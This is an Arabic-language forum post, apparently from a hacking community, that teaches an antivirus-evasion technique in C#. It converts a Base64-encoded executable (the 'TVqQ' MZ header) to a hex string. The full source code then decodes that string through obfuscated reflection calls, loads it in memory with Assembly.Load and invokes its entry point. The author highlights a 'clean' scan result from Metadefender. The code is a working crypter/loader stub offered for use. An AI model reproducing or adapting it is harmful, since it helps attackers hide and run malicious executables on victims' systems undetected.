14.01.2018 Base64 To HexString And BacK To Base64 Clean All 0/36


 • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,821
3,865
1
حياكم الله ياشباب
معلش اشرح بسرعه لان بالفديو مشروح كل شي
عندنا الفانكشن هنا بتحول لي السترينج العادي "بحالتنا بيس64" الى هكس سترينج
C#:
private static string StringToHex(string hexstring)
    {
      var sb = new StringBuilder();
      foreach (char t in hexstring)
        sb.Append(Convert.ToInt32(t).ToString("x") + " ");
      return sb.ToString();
    }
رح نحول قيم البيس 64 ورح يكونو عندك بالكليبورد فقط اعمللهم لصق باي مستند نصي
C#:
Clipboard.SetText(StringToHex("TVqQAAMAAAAEAAAA///g"));
رح ينتج لك القيم بالشكل التالي
5456715141414d4141414145414141412f
بس بيناتهم فراغات شيل الفراغات بالنوت باد ++
او شيل اضافة فراغ من الفانكشن
الان رح نرجع قيم البيس 64 سترينج ونحولهم لبايت اراي ونشغلهم
ناتج الفحص كلين
Results | Metadefender.com
هنا السورس كود كاملا
C#:
using System;
using Microsoft.VisualBasic;
public class Bashar
{
  public string Bachir(string hexString)
  {
    var stringValue = "";
    for (var i = 0; i < hexString.Length / 2; i++)
    {
      var hexChar = hexString.Substring(i * 2, 2);
      // ReSharper disable once PossibleNullReferenceException
      stringValue += (string)Type.GetType("System.Char")?.GetMethod("ConvertFromUtf32", new[] { typeof(int) })
        ?.Invoke(null, new object[] { (int) Type.GetType("System.Convert")?.GetMethod("ToInt32", new[] {typeof(string), typeof(int)})
          ?.Invoke(null, new object[] {hexChar, 16}) });
    }
    return stringValue;
  }
}
public class BasharBachir
{
  public static void Main()
  {
  Interaction.CallByName(Interaction.CallByName(Type.GetType("System.Reflection.Assembly")?.GetMethod("Load", new[] { typeof(byte[]) })
  ?.Invoke(null, new[] { Type.GetType("System.Convert")?.GetMethod("FromBase64String", new []{typeof(string)})?.Invoke(null, new object[]
  {(string) Type.GetType("Bashar")?.GetMethod("Bachir")?.Invoke(Type.GetType("Bashar")?.GetConstructor(Type.EmptyTypes)?.Invoke(new object[] { }),
  new object[] { "5456715141414" }) }) }) ?? throw new InvalidOperationException(),
  "EntryPoint", CallType.Get), "Invoke", CallType.Method, 10000000 - 10000000, null);
  }
}


لمشاهدة الشرح بالمرفقات
 

المرفقات